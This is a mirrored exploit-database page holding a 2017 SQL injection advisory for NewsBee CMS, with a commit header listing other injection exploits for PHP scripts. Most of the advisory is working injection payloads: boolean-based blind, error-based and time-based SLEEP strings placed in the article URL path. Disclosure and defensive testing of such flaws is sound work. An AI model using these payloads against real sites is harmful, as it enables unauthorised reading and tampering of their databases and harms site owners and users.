bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/41261.txt
Offensive Security ebbc883f34 DB: 2017-02-07 
13 new exploits

IVPN Client 2.6.1 - Privilege Escalation

Questions and Answers Script 1.1.3 - SQL Injection
Questions and Answers Script 1.1.3 - 'id' Parameter SQL Injection
ThisIsWhyImBroke Clone Script 4.0 - 'id' Parameter SQL Injection
Upworthy Clone Script 1.1.0 - 'id' Parameter SQL Injection
Ultimate Viral Media Script 1.0 - 'id' Parameter SQL Injection
Visual Link Sharing Websites Builder Script 2.1.0 - SQL Injection
ThisIsWhyImBroke Clone Script 4.0.0 - 'id' Parameter SQL Injection
Funny Image and Video Script 2.0.0 - 'id' Parameter SQL Injection
Clone Script Directory Script 1.1.0 - 'cid' Parameter SQL Injection
Viral Pictures and Video Script 2.0.0 - 'id' Parameter SQL Injection
NewsBee CMS - SQL Injection
Web Inspiration Gallery Script 1.0.0 - 'id' Parameter SQL Injection
Viral Fun Facts Sharing Script 1.1.0 - 'id' Parameter SQL Injection
Questions and Answers Script 2.0.0 - 'cid' Parameter SQL Injection
2017-02-07 05:01:16 +00:00

32 lines
1.6 KiB
Text
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

Exploit Title: NewsBee CMS SQL Injection
Date: 06.02.2017
Software Link: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937?s_rank=2
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
NewsBee is a Fully Featured News Site CMS (Content Management System). This CMS Includes almost everything you need to make a News Site easily and Creatively. The In build Features will help you to easily manage the site contents not only news articles, but also many other related contents which are commonly used in news sites.
Vulnerabilities:
SQL Injection
URL : http://localhost/newsbee/30[payload]_news_thai_soccer_targets_asia_wide_goals.html
Payload:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://localhost/newsbee/30' AND 5694=5694 AND 'fpmw'='fpmw_news_thai_soccer_targets_asia_wide_goals.html
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://localhost/newsbee/30' AND (SELECT 4020 FROM(SELECT COUNT(*),CONCAT(0x717a767a71,(SELECT (ELT(4020=4020,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Tdxc'='Tdxc_news_thai_soccer_targets_asia_wide_goals.html
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: http://localhost/newsbee/30' OR SLEEP(5) AND 'VLvJ'='VLvJ_news_thai_soccer_targets_asia_wide_goals.html
---
Reference in a new issue View git blame Copy permalink